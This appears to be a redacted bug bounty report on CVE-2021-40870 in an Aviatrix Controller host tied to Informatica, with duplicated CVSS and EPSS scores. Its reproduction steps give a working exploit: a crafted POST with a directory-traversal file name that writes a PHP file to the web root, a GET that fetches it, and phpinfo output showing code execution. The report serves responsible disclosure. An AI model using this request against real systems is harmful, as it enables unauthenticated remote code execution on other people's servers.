FdeleiteH1:1360593Informatica: CVE-2021-40870 in [███]
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.948 High
EPSS
Percentile
98.9%
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
The IP has a SSL certificate pointing to Informatica LLC.
curl -kvI https://█████████
Output
Server certificate:
* subject: ██████
Steps To Reproduce
First, run this request:
POST /v1/backend1 HTTP/1.1
Host: ████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>
The retrieve the content from file 1yv4QQmkj4h4OdmmyT11tkiGf5M.php
GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: ████
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Which is basically the output of the phpinfo function:
Response (truncated):
<tr><th>Variable</th><th>Value</th></tr>
<tr><td>SCRIPT_URL </td><td>/v1/1.php </td></tr>
<tr><td>SCRIPT_URI </td><td>https://█████████/v1/1.php </td></tr>
<tr><td>HTTPS </td><td>on </td></tr>
<tr><td>SSL_SERVER_S_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_S_DN_ST </td><td>California </td></tr>
<tr><td>SSL_SERVER_S_DN_L </td><td>Redwood City </td></tr>
<tr><td>SSL_SERVER_S_DN_O </td><td>Informatica LLC </td></tr>
<tr><td>SSL_SERVER_S_DN_OU </td><td>██████ </td></tr>
<tr><td>SSL_SERVER_S_DN_CN </td><td>██████ </td></tr>
<tr><td>SSL_SERVER_I_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_I_DN_O </td><td>HydrantID (Avalanche Cloud Corporation) </td></tr>
<tr><td>SSL_SERVER_I_DN_CN </td><td>HydrantID SSL ICA G2 </td></tr>
<tr><td>SSL_SERVER_SAN_DNS_0 </td><td>███ </td></tr>
<tr><td>SSL_VERSION_INTERFACE </td><td>mod_ssl/2.4.39 </td></tr>
Impact
- An unauthenticated, 3rd-party attacker or adversary can execute remote code
Supporting Material/References
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.948 High
EPSS
Percentile
98.9%